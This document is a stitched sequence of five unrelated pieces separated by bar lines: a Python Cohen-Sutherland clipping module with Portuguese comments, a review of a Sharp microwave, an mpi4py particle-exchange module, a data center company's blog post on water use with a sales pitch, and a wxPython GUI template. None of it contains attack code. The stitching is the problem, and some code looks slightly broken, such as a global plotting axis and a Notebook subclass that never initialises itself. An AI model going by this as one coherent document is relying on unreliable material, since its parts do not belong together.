## BIBLIOTECAS
#
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.lines as lines
from mpl_toolkits.axes_grid.axislines import SubplotZero
def initplot(size):
"""
Inicializa o desenho de gráficos.
"""
fig = plt.figure(1)
ax = SubplotZero(fig, 111)
fig.add_subplot(ax)
for direction in ["xzero", "yzero"]:
ax.axis[direction].set_axisline_style("-|>")
ax.axis[direction].set_visible(True)
for direction in ["left", "right", "bottom", "top"]:
ax.axis[direction].set_visible(False)
ax.set_xlim(-10, size)
ax.set_ylim(-10, size)
return (fig, ax)
def drawWindow(left, right, bottom, top):
"""
Desenha a janela de visualização.
"""
limR = right + 100
ix, iy = np.linspace(0, limR, limR - left), np.zeros(limR - left)
xw, xh = np.linspace(left, right, right-left+1), np.zeros(top-bottom+1)
yw, yh = np.zeros(right-left+1), np.linspace(bottom, top, top-bottom+1)
for mark in (bottom, top):
ax.plot(ix, iy + mark, linestyle=(0, (1, 5)), linewidth=1.0, color='black')
ax.plot(xw, yw + mark, linestyle=(0, ()), linewidth=1.5, color='black')
for mark in (left, right):
ax.plot(iy + mark, ix, linestyle=(0, (1, 5)), linewidth=1.0, color='black')
ax.plot(xh + mark, yh, linestyle=(0, ()), linewidth=1.5, color='black')
def drawLine(item, p1x, p1y, p2x, p2y, linewidth=1.0, color='blue'):
"""
Desenha a linha passada.
"""
mx, my = p2x - p1x, p2y - p1y # deltas x e y.
pm = (p1x + mx/2, p1y + my/2) # ponto médio.
m = my / mx if mx != 0 else float('inf') # inclinação da reta.
x, y = [], []
if m == float('inf'):
x = np.zeros(100) + p1x
y = np.linspace(p1y, p2y, 100)
else:
x = np.linspace(p1x, p2x, 100)
y = p1y + m * (x - p1x)
ax.plot(x, y, linewidth=linewidth, color=color)
if item:
ax.annotate(item,
xy=pm, xycoords='data',
xytext=(30, -15), textcoords='offset points',
arrowprops=dict(facecolor='black', shrink=0.05),
horizontalalignment='right', verticalalignment='middle')
INF = float('inf') # infinito.
BIT_L = 0B0001
BIT_R = 0B0010
BIT_B = 0B0100
BIT_T = 0B1000
def f(x, m, x1, y1):
"""
Equação da reta para y
"""
return y1 + m * (x - x1)
def fi(y, m, x1, y1):
"""
Equação da reta para x
"""
return ( x1 + (y - y1) / m ) if m != INF else x1
def csBinaryCode(left, right, bottom, top, x, y):
"""
Algoritmo de Cohen-Sutherland para recorte bidimensional em uma janela retangular.
Subrotina para calcular o código de determinado ponto.
"""
result = 0b0000
if x < left: result |= BIT_L
elif x > right: result |= BIT_R
if y < bottom: result |= BIT_B
elif y > top: result |= BIT_T
return result
def csIntersect(left, right, bottom, top, x, y, m, c, verbose=None):
"""
Calcula o ponto de intersecção válido a partir do ponto (x, y)
"""
p = (x, y)
if c:
if c & BIT_L: # ponto à esquerda.
p = (left, f(left, m, x, y)) # intersecção com esquerda.
elif c & BIT_R: # ponto à direita.
p = (right, f(right, m, x, y)) # intersecção à direita.
c = csBinaryCode(left, right, bottom, top, *p)
if verbose: print('{}\'={} - código: {:b}'.format(verbose, p, c))
if c & BIT_B: # ponto abaixo.
p = (fi(bottom, m, x, y), bottom) # intersecção abaixo.
elif c & BIT_T: # ponto acima.
p = (fi(top, m, x, y), top) # intersecção acima.
c = csBinaryCode(left, right, bottom, top, *p)
if verbose: print('{}\'={} - código: {:b}'.format(verbose, p, c))
return (p, c)
def CohenSutherland(left, right, bottom, top, p1x, p1y, p2x, p2y, verbose=False):
"""
Algoritmo de Cohen-Sutherland para recorte bidimensional em uma janela retangular.
"""
p1, p2 = (p1x, p1y), (p2x, p2y)
c1 = csBinaryCode(left, right, bottom, top, *p1)
c2 = csBinaryCode(left, right, bottom, top, *p2)
if verbose:
print('VERIFICANDO O SEGMENTO DE RETA {}-{} NA JANELA {}'.
format(p1, p2, (left, right, bottom, top)))
print('--------------------------------------------------------------------')
print('Os códigos binários são: P1{}: {:b} e P2{}: {:b}.'.
format(p1, c1, p2, c2))
result, m = None, None
if c1 & c2: # caso trivial de invisitibilidade total.
assert True
# senão, c1 & c2 == 0 - é total ou parcialmente visível.
elif c1 | c2: # parcialmente visível.
mx, my = p2x - p1x, p2y - p1y # deltas x e y.
m = my / mx if mx != 0 else INF # inclinação da reta.
## Calcula intersecções com as arestas.
#
p1, c1 = csIntersect(left, right, bottom, top, *p1, m, c1,
'P1' if verbose else None)
p2, c2 = csIntersect(left, right, bottom, top, *p2, m, c2,
'P2' if verbose else None)
result = (*p1, *p2)
else: # totalmente visível.
result = (*p1, *p2)
if verbose:
msg = 'TRIVIAL E COMPLETAMENTE IN' if result == None else ('PARCIALMENTE ' if c1 | c2 else 'TOTALMENTE ')
print('O segmento de reta é {}VISÍVEL'.format(msg))
if result != None:
print('A inclinação da reta é {}'.format(m))
print('Deve-se traçar o segmento {}-{}'.
format((result[0], result[1]), (result[2], result[3])))
print('====================================================================\n')
return result
def show():
plt.tight_layout()
plt.show()
fig, ax = initplot(1000)
|
Well built and easy to use. The black colour scheme may not suit all kitchens.
Finished in a stealth black exterior, the R372KM from Sharp provides a substantial 25 litre capacity, with 11 different power levels and 8 assorted auto cook and defrost settings.
The controls are very well labelled - you won't need to consult the manual in order to be up and running - no symbols are featured, and instead each button is clearly marked with easy to read text.
Build quality is pretty good - the various sections of the microwave feel like they are well constructed.
Overall dimensions are 30.6cm by 51.3cm by 42.9cm, and inside the microwave you'll find a generously sized 31.5cm turntable, which should accommodate the majority of large plates and dishes.
Our testers were impressed with the cooking performance of this microwave - with no cold spots or uncooked areas.
Essentially this is a well built, large solo microwave, which is both easy to use and performs well.
The Sharp R372KM offers pretty good value, and is very easy to operate. If you need a large solo microwave, then the R372KM is well worth considering.
What are the internal measurements of this microwave?
|
# script with functions to use in main-file
# this script handle the "communication of particles between ranks"-part
import sys
# Simen Mikkelsen, 2016-11-21
# communication.py
'''
def exchange(X):
# Handle all the communication stuff here
# return the updated particle arrays
# (which may be of a different length now)
return X
'''
### TODO:
#implement 'find biggest factor'-function or another dynamical function to determine number of cells in each direction
import numpy as np
import mpi4py.MPI as MPI
### TODO: import comm from main?
#comm = MPI.COMM_WORLD
#rank_communication_module = communicator.Get_rank() # not used, parameter given from main
#mpi_size_communication_module = communicator.Get_size() # not used, parameter given from main
## INITIALISING start
# number of cells in each direction (only divide x-direction initially)
cell_x_n = 20
cell_y_n = 0
cell_n = cell_x_n + cell_y_n
# scaling factor when expanding/scrinking local arrays
scaling_factor = 1.25 ## variable
shrink_if = 1/(scaling_factor**3)
# the particles are defined with its properties in several arrays
# one tag for each properties which are communicated to other ranks
# tags: id, x-pos, y-pos
# other properties: active-status
tag_n = 3
# buffer overhead to use in memory reservation for non-blocking communication
buffer_overhead = 1000
## INITIALISING end
# spatial properties
x_start = 0
x_end = 1
y_start = 0
y_end = 1
x_len = x_end - x_start
y_len = y_end - y_start
## VARIABLES start
## VARIABLES end
## secondary FUNCTIONS start
# function to find the corresponding rank of a cell
# this function determines how the cells are distributed to ranks
### TODO: discussion: how to do this distribution
def find_rank_from_cell(cell_id, mpi_size):
return int(cell_id % mpi_size)
# function to find the corresponding cell of a position
# this function determines how the cells are distributed geometrically
### TODO: discussion: how to do this distribution
def find_cell_from_position(x, y):
return int(((x - x_start)/(x_len))*(cell_x_n)) # for 1D
# send_n_array: array to show how many particles should be sent from one rank to the others
# filled out locally in each rank, then communicated to all other ranks
# rows represent particles sent FROM rank = row number (0 indexing)
# column represent particles sent TO rank = row number (0 indexing)
# function to fill out the array showing number of particles need to be sent from a given rank given thelocal particles there
# local particles are the particles who belonged to the rank before the transport of particles.
# some of the particles may have to been moved to a new rank if they have been moved to a cell belonging to a new rank
# send_to: array to show which rank a local particle needs to be sent to. or -1 if it should stay in the same rank
def global_communication_array(mpi_size, rank, particle_n, particle_x, particle_y, particle_active):
#print('global com.array, particle n:', particle_n)
# reset arrays telling which particles are to be sent
send_to = np.zeros(particle_n, dtype=int) # local
send_to[:] = -1
send_n_array = np.zeros((mpi_size, mpi_size), dtype=int)
for i in range(particle_n):
# only check if the particle is active
if particle_active[i]:
# find the rank of the cell of which the particle (its position) belongs to
particle_rank = find_rank_from_cell(find_cell_from_position(particle_x[i], particle_y[i]), mpi_size)
# if the particle's new rank does not equal the current rank (for the given process), it should be moved
if particle_rank != rank:
send_n_array[int(rank)][int(particle_rank)] = send_n_array[int(rank)][int(particle_rank)] + 1
send_to[i] = particle_rank
# converted indices to int to not get 'deprecation warning'
return send_to, send_n_array
# function to reallocate active particles to the front of the local arrays
# active_n = number of active particles after deactivation of particles sent to another rank, but before receiving.
# aka. particles that stays in its own rank
def move_active_to_front(particle_id, particle_x, particle_y, particle_active, active_n):
#print('move_active_to_front(), particle_active, active_n:', particle_active.dtype, active_n)
particle_id[:active_n] = particle_id[particle_active]
particle_x[:active_n] = particle_x[particle_active]
particle_y[:active_n] = particle_y[particle_active]
# set the corresponding first particles to active, the rest to false
particle_active[:active_n] = True
particle_active[active_n:] = False
return particle_id, particle_x, particle_y, particle_active
## secondary FUNCTIONS end
## main FUNCTION start
# all variables taken in by exchange() are local variables for the given rank (except mpi_size)
def exchange(communicator,
mpi_size,
rank,
#particle_n, # could also be calculated in function: particle_n = np.size(particle_id)
particle_id,
particle_x,
particle_y,
particle_active):
#print('mpi_size from main module', mpi_size)
#print('mpi_size from communication module', mpi_size_communication_module)
#print('rank from main module', rank)
#print('rank from communication module', rank_communication_module)
# compute "global communication array"
# with all-to-all communication
# length of local particle arrays
particle_n = np.size(particle_id)
# note: not necessary equal to number of active particles
send_to, send_n = global_communication_array(mpi_size, rank, particle_n, particle_x, particle_y, particle_active)
# all nodes receives results with a collective 'Allreduce'
# mpi4py requires that we pass numpy objects (byte-like objects)
send_n_global = np.zeros((mpi_size, mpi_size), dtype=int)
communicator.Allreduce(send_n, send_n_global , op=MPI.SUM)
# each rank communicate with other ranks if it sends or receives particles from that rank
# this information is now given in the "global communication array"
# point-to-point communication of particles
# using list of arrays for communication of particle properties
# initializing "communication arrays": send_*** and recv_***
# send_**: list of arrays to hold particles that are to be sent from a given rank to other ranks,
# where row number corresponds to the rank the the particles are send to
# recv_**: list of arrays to hold particles that are to be received from to a given rank from other ranks,
# where row number corresponds to the rank the particles are sent from
send_id = []
send_x = []
send_y = []
recv_id = []
recv_x = []
recv_y = []
# total number of received particles
received_n = np.sum(send_n_global, axis = 0)[rank]
for irank in range(mpi_size):
# find number of particles to be received from irank (sent to current rank)
Nrecv = send_n_global[irank, rank]
# append recv_id with the corresponding number of elements
recv_id.append(np.zeros(Nrecv, dtype = np.int64))
recv_x.append(np.zeros(Nrecv, dtype = np.float64))
recv_y.append(np.zeros(Nrecv, dtype = np.float64))
# find number of particles to be sent to irank (from current rank)
Nsend = send_n_global[rank, irank]
# append send_id with the corresponding number of elements
send_id.append(np.zeros(Nsend, dtype = np.int64))
send_x.append(np.zeros(Nsend, dtype = np.float64))
send_y.append(np.zeros(Nsend, dtype = np.float64))
# counter to get position in send_** for a particle to be sent
send_count = np.zeros(mpi_size, dtype=int)
# iterate over all local particles to allocate them to send_** if they belong in another rank
for i in range(particle_n):
# if particle is active (still a local particle) and should be sent to a rank (-1 means that the particle already is in the correct rank)
if (particle_active[i] and send_to[i] != -1):
# fill the temporary communication arrays (send_**) with particle and it's properties
send_id[send_to[i]][send_count[send_to[i]]] = i
send_x[send_to[i]][send_count[send_to[i]]] = particle_x[i]
send_y[send_to[i]][send_count[send_to[i]]] = particle_y[i]
# deactivate sent particle
particle_active[i] = False
# increment counter to update position in temporary communication arrays (send_**)
send_count[send_to[i]] = send_count[send_to[i]] + 1
# actual exchange of particle properties follows
# must convert the list of arrays which are to be communicated to numpy objects (byte-like objects)
# this is not done before because np.ndarrays does not support a "list of arrays" if the arrays does not have equal dimensions
#send_id_np = np.array(send_id)
#recv_id_np = np.array(recv_id)
#send_x_np = np.array(send_x)
#recv_x_np = np.array(recv_x)
#send_y_np = np.array(send_y)
#recv_y_np = np.array(recv_y)
# requests to be used for non-blocking send and receives
send_request_id = [0] * mpi_size
send_request_x = [0] * mpi_size
send_request_y = [0] * mpi_size
recv_request_id = [0] * mpi_size
recv_request_x = [0] * mpi_size
recv_request_y = [0] * mpi_size
# sending
for irank in range(mpi_size):
if (irank != rank):
# number of particles rank sends to irank
Nsend = send_n_global[rank, irank]
# only receive if there is something to recieve
if (Nsend > 0):
#print('rank:', rank, 'sending', Nsend, 'particles to', irank)
# use tags to separate communication of different arrays/properties
# tag uses 1-indexing so there will be no confusion with the default tag = 0
send_request_id[irank] = communicator.isend(send_id[irank][0:Nsend], dest = irank, tag = 1)
send_request_x[irank] = communicator.isend(send_x[irank][0:Nsend], dest = irank, tag = 2)
send_request_y[irank] = communicator.isend(send_y[irank][0:Nsend], dest = irank, tag = 3)
# receiving
for irank in range(mpi_size):
if (irank != rank):
# number of particles irank sends to rank (number of particles rank recieves from irank)
Nrecv = send_n_global[irank, rank]
# only receive if there is something to recieve
if (Nrecv > 0):
#print('rank:', rank, 'receiving', Nrecv, 'particles from', irank)
buf_id = np.zeros(Nrecv+buffer_overhead, dtype = np.int64)
buf_x = np.zeros(Nrecv+buffer_overhead, dtype = np.float64)
buf_y = np.zeros(Nrecv+buffer_overhead, dtype = np.float64)
# use tags to separate communication of different arrays/properties
# tag uses 1-indexing so there will be no confusion with the default tag = 0
recv_request_id[irank] = communicator.irecv(buf = buf_id, source = irank, tag = 1)
recv_request_x[irank] = communicator.irecv(buf = buf_x, source = irank, tag = 2)
recv_request_y[irank] = communicator.irecv(buf = buf_y, source = irank, tag = 3)
# obtain data from completed requests
# only at this step is the data actually returned.
for irank in range(mpi_size):
if irank != rank:
# if there is something to receive
if send_n_global[irank, rank] > 0: # Nrecv > 0
recv_id[irank][:] = recv_request_id[irank].wait()
recv_x[irank][:] = recv_request_x[irank].wait()
recv_y[irank][:] = recv_request_y[irank].wait()
#print('recv_id_np:', recv_id_np)
#print("recv_x_np:", recv_x_np)
#print("recv_y_np:", recv_y_np)
# make sure this rank does not exit until sends have completed
for irank in range(mpi_size):
if irank != rank:
# if there is something to send
if send_n_global[rank, irank] > 0: # Nsend > 0
send_request_id[irank].wait()
send_request_x[irank].wait()
send_request_y[irank].wait()
# total number of received and sent particles
# total number of active particles after communication
sent_n = int(np.sum(send_n_global, axis = 1)[rank])
received_n = int(np.sum(send_n_global, axis = 0)[rank])
active_n = int(np.sum(particle_active))
# move all active particles to front of local arrays
if (active_n > 0):
particle_id, particle_x, particle_y, particle_active = move_active_to_front(particle_id, particle_x, particle_y, particle_active, active_n)
# resize local arrays if needed
# current scaling factor = 1.25
### TODO: add ceil/floor directly in if-check?
# check if local arrays have enough free space, if not, allocate a 'scaling_factor' more than needed
if (active_n + received_n > particle_n):
new_length = int(np.ceil((active_n + received_n)*scaling_factor))
# if new length is not equal old length: resize all local arrays
if new_length != particle_n:
#print('extending arrays to new length:', new_length)
# with .resize-method, missing/extra/new entries are filled with zero (false in particle_active)
### TODO: change from resize function to method
particle_active = np.resize(particle_active, new_length)
particle_id = np.resize(particle_id, new_length)
particle_x = np.resize(particle_x, new_length)
particle_y = np.resize(particle_y, new_length)
# particle_active.resize(new_length, refcheck = False)# refcheck = True by default
# particle_id.resize(new_length, refcheck = False)
# particle_x.resize(new_length, refcheck = False)
# particle_y.resize(new_length, refcheck = False)
# check if local arrays are bigger than needed (with a factor: shrink_if = 1/scaling_factor**3)
# old + new particles < shrink_if*old_size
# if they are, shrink them with a scaling_factor
if (active_n + received_n < shrink_if*particle_n):
new_length = int(np.ceil(particle_n/scaling_factor))
# if new length is not equal old length: resize all local arrays
if new_length != particle_n:
#print('shrinking arrays to new length:', new_length)
### TODO: change from resize function to method
particle_active = np.resize(particle_active, new_length)
particle_id = np.resize(particle_id, new_length)
particle_x = np.resize(particle_x, new_length)
particle_y = np.resize(particle_y, new_length)
# particle_active.resize(new_length, refcheck = false)# refcheck = true by default
# particle_id.resize(new_length, refcheck = false)
# particle_x.resize(new_length, refcheck = false)
# particle_y.resize(new_length, refcheck = False)
# add the received particles to local arrays
# unpack (hstack) the list of arrays, (ravel/flatten can not be used for dtype=object)
if received_n > 0:
particle_id[active_n:active_n+received_n] = np.hstack(recv_id)
particle_x[active_n:active_n+received_n] = np.hstack(recv_x)
particle_y[active_n:active_n+received_n] = np.hstack(recv_y)
# set the received particles to active
particle_active[active_n:active_n+received_n] = np.ones(received_n, dtype = np.bool)
# optional printing for debugging
# print values for debugging
#print('particle_n (old value):', particle_n)
#print("old active_n:", active_n)
#print("sent_n:", sent_n)
#print("received_n:", received_n)
#print("new active_n:", np.sum(particle_active))
#print('new length of local arrays:', np.size(particle_id))
#print("new local particles:", particle_id)
#print("new active particles:", particle_active*1) # *1 to turn the output into 0 and 1 instead of False and True
else:
print("\nno received particles")
# print global array
if rank == 0:
print('\nglobal_array:\n', send_n_global)
# return the updated particle arrays
return (particle_id,
np.array([ particle_x, # x component
particle_y]),# x component
particle_active)
|
All systems are online and operational.
Subscribe to the Data Center News Digest!
Facility managers across all data centers are concerned about power usage. But there is another significant resource widely consumed by data centers across the world that is more precious than power.
We are talking about usage of water, a resource that a data center simply needs loads of it. The alarming state of its usage is forcing companies to come out with innovative ways to measure water consumption and efficiency. The biggest example is that of Facebook when it showed off its new concept of Water Usage Effectiveness (WUE) for its data center in Prineville, Oregon.
The new metric introduced by Facebook was one of a kind and showed that efficiency of a data center should be measured in more ways than just one (i.e. the power consumption).
Similarly, the concept of using water from industrial canals as done in Google's data center in Belgium is another attempt at conserving water. Microsoft also made the cut with recycled water usage in its data centers in San Antonio, TX.
Though both these methods require the recycled water to be treated periodically, it definitely saves on water consumption.
Several measures like increasing the humidity levels in the data center, raising the air temperature, sealing up the data center etc have all been experimented and are additional ways to reducing water consumption in data centers.
The rise of electronic data usage will only pave way for more water usage as more and more data center facilities will be required to handle the volume. Compared to the previous decade, studies say there has been over 150 percent increase in internet usage in the US alone.
Data center facilities for the NSA in Utah have reportedly consumed an average of 1.7 million gallons of water per day for its operation that includes cooling and heat dissipation.
So an effective water conservation plan should be adopted in data center facilities to ensure fair usage of this natural resource, which is more precious than electricity. Striking a balance with resource consumption in your data center facility could prove to be a Herculean task.
This is when outsourcing your data center needs to an expert data center service provider like us would prove to be the vantage point in your business. At Lifeline Data Centers, we are committed to providing our customers with the greenest and the most balanced data center solutions for your business needs. Visit our website to know more about our co-location services.
Alex, co-owner, is responsible for all real estate, construction and mission critical facilities: hardened buildings, power systems, cooling systems, fire suppression, and environmentals. Alex also manages relationships with the telecommunications providers and has an extensive background in IT infrastructure support, database administration and software design and development. Alex architected Lifeline’s proprietary GRCA system and is hands-on every day in the data center.
Big Data is Essential, But Are You Equipped to Handle It?
Want a quick look at what we do and who we are? Download our Lifeline Data Centers One Sheet.
We’ve created a comprehensive guide on data center power compartmentalization and why it’s important for your business. Download it now!
Lifeline Data Centers has an ongoing program for civic leaders, authorities, executives, technology leaders, and influencers in the region to join them for a free lunch and learn at our Eastgate Facility. At times, we will have a guest speaker, and other times we will have an open forum for our leaders to share challenges and get guidance from other professionals. If you’re interested in speaking at a luncheon, please contact us and let us know.
|
#********************************************************************************
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#********************************************************************************
#
# Created by Brian Keene on 8 September 2016
#
# Revision history:
#
#
#********************************************************************************
# note - on OSX, requires framework build of python/2.7 to run, as this
# application requires access to the screen (this might only apply to systems
# running Mavericks or later)
# This script for a graphical user interface is intended to serve as a template for
# graphical user interfaces; primarily intended to be used as a simplified
# front-end of wx.Widgets, and to allow for easy setup of dynamic hiding that
# might involve cross-communication between objects of assorted placement in
# the hierarchy of parent-child objects. Allows for an OOP creation of a GUI,
# with emphasis on easy modification in the accompanying script.
# import the needed modules
import wx, os
# global dictionary in which we store data
myDict = {}
class wxFrame(wx.Frame):
# note to others: we pass another class (an instance of Frame) to this wx.Frame derived class;
# the ambiguity of parent in the class __init__ vs the wx.Frame.__init__ is due to parent in the
# wx.Frame.__init__ function being a /keyword/ argument, rather than a python convention, as is used
# in the class __init__ function. The wx.Frame.__init__ parent argument /must/ be a wx.Window object,
# or simply value "None", which is what we usually use
# __init__ takes the implicit self argument as usual
# and 'sibling' here is an instance of our 'Frame' class defined immediately below this class.
# 'sibling' holds all the necessary data needed to define a wx.Frame object.
def __init__(self,sibling):
wx.Frame.__init__(self,parent=sibling._parent,title=sibling._title)
self.SetInitialSize(sibling._size)
# we define our own Frame() class, because we don't instantly want to create an actual wx.Frame object yet
class Frame:
# a static class object we can access using Frame._register[index] - we don't access this via an instance of
# the class; we can also iterate over it, looking for instances with specific data
_register = []
_typeName = "Frame"
# implicit argument self
# parent: typically None, but if a frame is spawned dynamically it may be useful to pass the relevant object
# title: string displayed at the top of the frame (the name)
# size: integer tuple (e.g., (100,100)) specifying the size of the frame in pixels
def __init__(self, parent, title, size, **kwargs):
self._parent = parent;
self._title = title;
self._size = size;
# an instance variable holding other instances that are children of this instance
self._children = []
def initObj(self):
# make an instance of the frame, that is a derived class of the wx.Frame class
self._obj = wxFrame(self)
Frame._register.append(self)
# iterate over this instance's children and initialize them.
for obj in self._children:
obj.initObj();
# we have now instantiated all of the objects on this frame; show the frame
self._obj.Show()
# a wxNotebook class
class wxNotebook(wx.Notebook):
# the implicit self argument, as usual
# and 'sibling' - the instance of 'Notebook' class (defined below) holding all
# necessary data needed to define the wx.Notebook
def __init__(self,sibling):
wx.Notebook(sibling._parent._obj)
self._pages = [];
for index, item in enumerate(sibling._children):
item.initObj();
self._pages.append(item._obj)
self.AddPage(self._pages[index], item._name);
self.NBSizer = wx.BoxSizer();
self.NBSizer.Add(self,1,wx.EXPAND)
sibling._parent._obj.SetSizer(self.NBSizer)
# our notebook class that collates information before making a wx.Notebook notebook
class Notebook:
# the implicit self argument
# parent panel object
# the pages to be added to this notebook
# and the names of the pages
_register = []
_typeName = "Notebook"
def __init__(self,parent, **kwargs):
# instantiate the notebook
self._parent = parent;
# an instance variable holding other instances that are children of this instance
self._children = [];
self._pages = [];
# append this instance to a list belonging to the parent, so that the parent knows
parent._children.append(self);
def initObj(self):
# our wxNotebook method initiates the instantiation of the self._children objects
self._obj = wx.Notebook(self._parent._obj)
# create a wxNotebook instance and store it in self._obj; pass 'self' as the argument
# i.e., we pass this instance of Notebook as the 'sibling' argument (the wxNotebook 'self' is implicit)
##self._obj = wxNotebook(self)
for index, item in enumerate(self._children):
item.initObj();
self._pages.append(item._obj);
self._obj.AddPage(self._pages[index], item._name);
self.NBSizer = wx.BoxSizer();
self.NBSizer.Add(self._obj, 1, wx.EXPAND)
self._parent._obj.SetSizer(self.NBSizer)
Notebook._register.append(self)
def customBehavior():
pass
# i think this has to be incorporated in the wxNotebook class, rather than here;
def OnPageChanging(self,event):
oldPage = event.GetOldSelection()
newPage = event.GetSelection()
customBehavior()
class wxPanel(wx.Panel):
def __init__(self,sibling):
wx.Panel.__init__(self,parent=sibling._parent._obj);
self._needsSizer = True;
for obj in sibling._children:
if obj._typeName == "Notebook":
self._needsSizer = False;
break
if self._needsSizer:
self.grid = wx.GridBagSizer(hgap=5,vgap=5);
self.SetSizer(self.grid);
# call the init methods of the objects, which then places wxWidget objects in the self._widgets variable for
# each Widget class instance
# a panel holding a notebook will never have a widget - its a dummy panel
# if it does, this is where an error will be thrown!
for child in sibling._children:
if child._typeName == "Widget":
child.initObj(self);
self.grid.Add(child._obj, pos=child._pos, span=child._span, flag=child._gridFlags)
# if the base child widget object is a label, it won't have a function
if ((child._function is not None) and (child._wxEvt is not None)):
self.Bind(child._wxEvt,child._function,child._obj)
if child._label is not None:
# we know that this will be a label;
child._labelObj = wx.StaticText(self,label=child._label)
self.grid.Add(child._labelObj,child._labelPos, child._labelSpan)
if (child._hasSlave):
self.Bind(child._wxEvt, child.masterFunction, child._obj)
# some objects are initially hidden; here, we hide them.
if (child._initHide):
child._obj.Hide()
if (child._label is not None):
child._labelObj.Hide()
self.Layout()
# in this class, we collate all the information we'll need to make a well-defined wx.Panel object
class Panel:
# what do we require from the user to instantiate a base panel object?
# make an iterable list of panel instances; make sure methods only access this /after/
# the main frame has added all objects (i.e., at the end of th user's GUI script!)
_register = []
# all instances of this class have the _typeName = "Panel"
_typeName = "Panel"
def __init__(self, parent,**kwargs):
# a list of widget objects, from our widgets class, that identify this panel as their parent panel
# note that we do /not/ need more information, as this has the instanced objects; we can call their methods
# directly from here! Very convenient.
self._widgets = [];
# panel must have parent object on which it is displayed
self._parent = parent;
# a list of the instances that have this instance of the Panel class as their parent
self._children = []
parent._children.append(self);
# we use a name if this panel is a child of a Notebook object; in this case, the name is
# displayed atop the notebook
self._name = kwargs.get("name",None)
def initObj(self):
# we initialize the panel, which then refers to all of the panel's widgets' methods for their instantiation
self._obj = wxPanel(self);
# append this instance to the class register, so that we may iterate over the class instances if needed
Panel._register.append(self);
# iterate over self._children, and initialize objects that are /not/ of the type widget; these will
# be initialized in the wxPanel class!
for obj in self._children:
if (obj._typeName != "Widget"):
obj.initObj()
def deleteWidget():
pass
def bindToFunction():
# ehhhh... we might have already done this in the widget class. could be better that way.
pass
#class wxWidget:
# def __init__(self,sibling):
# self._widget = None;
# if sibling._
class Widget:
_register = []
_typeName = "Widget"
# for all Widget objects, we need the parent object, widgetType, name, and position
def __init__(self,parent,widgetType,name,pos,**kwargs):
# note that we use **kwargs to pass in information that may be specific to certain type
# of widget; e.g., text widget vs button vs ... etc.
# **kwargs is a list of KeyWord ARGumentS (kwargs) of arbitrary length
# note that, by default, there is no label (and no label position <(int,int)> provided
#####################
# Required arguments, for all widget types
#####################
self._parent = parent; # parent object, typically an instance of Panel
self._widgetType = widgetType; # button, textwidget, label, etc.
self._name = name; #string
self._pos = pos; #tuple of coords: "(integer, integer)"
#####################
# Required arguments, for some widget types
#####################
# required for choice widgets
self._choices = kwargs.get('choices',None)
############################
# optional arguments
# we can specify a label (if so, must specify a position)
# the spans of the label and widget default to (1,1)
# if a widget can use an initial value (e.g., a text control), it defaults to an empty string
# if a widget is to be bound to a function, must specify this explicitly or bind to it later
############################
self._label = kwargs.get('label',None)
self._labelPos = kwargs.get('labelPos',None)
# default behavior of span is (1,1) if not specified
self._span = kwargs.get('span',(1,1))
self._labelSpan = kwargs.get('labelSpan',(1,1))
self._initValue = kwargs.get('value',"")
self._function = kwargs.get('function',None)
self._wxEvt = None
self._hasMaster = False; # default this to false; changed if the setMaster() function is called on self
self._hasSlave = False;
# these will be instantiated during the creation of the parent object
self._labelObj = None;
self._obj = None;
# Hide most objects at first; that way, they only show if they are told to show,
# and otherwise will hide when told to hide
# implement this /after/ we have connected all the show/hide funcitonality
self._initHide = False;
# TODO: have the Panel's grid.Add() method use these flags when instantiating the widget
self._gridFlags = (wx.RESERVE_SPACE_EVEN_IF_HIDDEN | wx.EXPAND | wx.ALIGN_CENTER)
# append the object to the list of children in the parent instance
parent._children.append(self)
# the master widget - this is a /Widget/ instance
self._masters = []
# denotes messages from master that instruct self to Hide()
# these should be strings
self._hideWhen = []
# widgets to which self is master; note that this is set implicitly via setMaster, when
# other widgets denotes self as master
# this is a /Widget/ instance (not a wx object)
self._slaves = []
Widget._register.append(self); # append this instance to the class register
# allows the function to which the widget will be bound to be set after construction of the widget instance
# we allow the function to be defined according to whatever parameters the user inputs; no implicit self
def masterFunction(self,event):
# pass the value of this widget to slaved widgets
message = str(event.GetString())
for slave in self._slaves:
slave.evaluateMessage(message);
def evaluateMessage(self,message):
# this is used by the interface to loop over child widgets
# in the event that a chosen selection hides multiple levels of the parent-child hierarchy.
# continues until exhaustion
if message in self._hideWhen:
self._obj.Hide()
if (self._labelObj is not None):
self._labelObj.Hide()
self._parent._obj.Layout()
else:
self._obj.Show()
if (self._labelObj is not None):
self._labelObj.Show()
self._parent._obj.Layout()
def setMaster(self, master, hideWhen):
self._masters.append(master)
# assume hideWhen is in the form of an array
for instruction in hideWhen:
self._hideWhen.append(instruction)
# append self to master._slaves[]
master._slaves.append(self);
self._hasMaster = True;
if master._hasSlave == False:
master._hasSlave = True;
def setFunction(self,function):
self._function = function;
def setGridFlags(self,flags):
self._gridFlags = flags;
def setInitHide(self,boolean):
self._initHide = boolean;
# maybe the user wants to attach labels later; allow them to do so here
def setLabel(self,label,labelPos,**kwargs):
self._label = label;
self._labelPos = labelPos;
self._labelSpan = kwargs.get('labelSpan',(1,1))
# this is a bottom level object; it requires a parentInstance on initialization
def initObj(self,parentInstance):
# for each, initialize the wx object in self._obj, and inform the class what kind of wx event to
# expect in self._wxEvt
#self._obj = wxWidget(self)
if (self._widgetType == "text"):
self._obj = wx.TextCtrl(parentInstance,value=self._initValue,name=self._name)
self._wxEvt = wx.EVT_TEXT
# need to add all types of widgets here; remember to overload necessary parameters for each via kwargs.get()
elif (self._widgetType == "choice"):
#choicesList
if (self._choices is None):
raise ValueError('%s has no choices! Please specify choices for the choice widget.' %(self._name))
self._obj = wx.Choice(parentInstance,-1,choices=self._choices,name=self._name)
self._wxEvt = wx.EVT_CHOICE
# more types of widgets to be implemented
elif (self._widgetType == "button"):
if (self._name is None):
raise ValueError('%s has no name! The name of the button is displayed on the button, and \n\
is required!' %(self._name))
self._obj = wx.Button(parentInstance,label=self._name, name=self._name)
self._wxEvt = wx.EVT_BUTTON
elif (self._widgetType == "static"):
self._obj = wx.StaticText(parentInstance,label=self._name, name=self._name)
self._wxEvt = None
|
